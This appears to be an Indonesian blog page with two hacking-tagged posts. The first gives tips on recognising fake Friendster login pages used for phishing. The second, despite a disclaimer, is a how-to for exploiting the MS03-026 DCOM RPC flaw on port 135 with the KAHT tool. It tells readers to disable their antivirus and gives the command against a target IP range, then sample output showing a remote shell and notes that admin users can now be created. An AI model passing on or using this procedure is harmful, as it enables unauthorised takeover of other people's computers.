Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

1/22/09

Cara menghindari Fake Login Friendster

Friendster merupakan situs jejaring sosial yang paling populer di kalangan anak muda. Selain fungsi utamanya untuk memperoleh banyak teman atau bertemu teman lama, layanan ini juga memiliki banyak celah keamanan yang dimanfaatkan oleh sebagian orang/hacker-hacker yang bertujuan hanya sekedar iseng sampai dengan motif dendam.

Salah satunya yang lagi marak saat ini (menurut saya) adalah Fake Login.
Fake login merupakan alamat Friendster palsu yang digunakan untuk mengambil email dan password milik orang lain.

Cara kerjanya bisa lewat testimonial atau hanya dengan mengklik URL profile temanmu yang sudah dipasangi Fake Login. Setelah itu korban akan masuk ke halaman Friendster palsu untuk kemudian mengisikan Email dan password, dengan hitungan beberapa menit saja, ID serta password korban akan langsung terkirim ke email orang yang membuat fake login ini. Akibatnya, korban akan mulai mengambil alih dengan ID milik kamu, dia bisa dengan sesuka hati merubah profile, mengubah foto dengan foto yang tidak benar, dll.

Namun jangan khawatir, ada cara untuk menghidari hal tersebut (pencegahan lebih baik dari pada mengobati).
Cara ini saya peroleh berdasarkan pengalaman pribadi. Silahkan disimak baik-baik :

- Waspadai testimonial dari orang yang baru anda kenal/tidak dikenal.
Waspadai juga testimonial yang bersifat menggoda. Contoh, Hi… cantik, gimana kabarnya ???. dari contoh tersebut, bisa dilihat bahwa testimonial ini bersifat menggoda untuk/perlu dijawab. Biasanya si penerima akan langsung mengklik apablia mendapat testi seperti itu dengan tujuan untuk membalas testinya.

- Perhatikan alamat address bar jika anda masuk ke alamat bukan profile teman anda, biasanya fake login beralamat di http://h1.ripway.com/friendster/login/log.txt atau yang sejenisnya.

- Jika anda membuka/mengklik testi atau profile teman. Pastikan kamu tidak dibawanya ke sebuah alamat untuk login lagi, padahal sebelumnya anda sudah login.

- Bila sudah masuk ke sebuah halaman baru untuk login lagi, jangan sekali-kali anda mengisi form login tersebut. Langsung saja back atau kembali ke halaman sebelumnya.

read more...

3/25/08

Hacking

Hacking

oleh webmaster


Artikel ini bukan bertujuan untuk mengajari pembaca untuk berbuat jahat dengan cara membobol password komputer orang lain, tapi hanya sekedar mengingatkan kepada anda terutama bagi administrator jaringan atau pengguna komputer yang terkoneksi ke jaringan agar berhati-hati dan selalu waspada bahwa password /komputer anda mudah di bobol dan diambil alih oleh orang lain.
kali ini penulis menggunakan metode explosits port 135 (DCOMRPC) dimana semenjak adanya issue virus W32 Welcia K yang menyerang port 135, yang dalam hal ini diakui oleh pihak microsoft (Baca Microsoft Security Bulletin MS03-026). target dari worm ini adalah pc yang menggunakan IIS 5.0 seperti windows 2000 /XP.

Untuk mempersingkat bagaimana caranya kita membobol password di windows kita menggunakan Tools Kaht bisa anda download disini .
Karena proses ini menggunakan worm sebaiknya anda mendisable antivirus anda.
Langkahnya :
1. Unzip file Kaht.zip
2. Letakkan pada direktori yang anda suka.
3. Masuk ke direktori tempat file berada melalui text mode
4. Tentukan sasaran pc yang akan di hacking missal
IP : 192.168.30.3
Kaht 192.168.30.1 192.168.30.3
Jika hacking anda berhasil akan tampil pada command line kira-kira sbb:



KAHT II - MASSIVE RPC EXPLOIT dst


[+] Target: 192.168.30.1-192.168.30.3 with 50 Treads
[+] Attacking Port:135. Remote Shell at port:36388
[+] Scan In Progress......
- Connecting to 192.168.30.3
Sending Exploit to a [Win2k] Server
- Connectando con la Shell Remote
dst........
C:WINNTsystem32>

Berarti anda sudah masuk ke komputer yang anda hack dan komputer sepenuhnya sudah anda kuasai. anda bisa membuat user admin membuat sharing dll.

Sekali lagi artikel ini sekedar mengingatkan kepada anda berhatihatilah dalam mengelola komputer anda terutama Administator jaringan.

read more...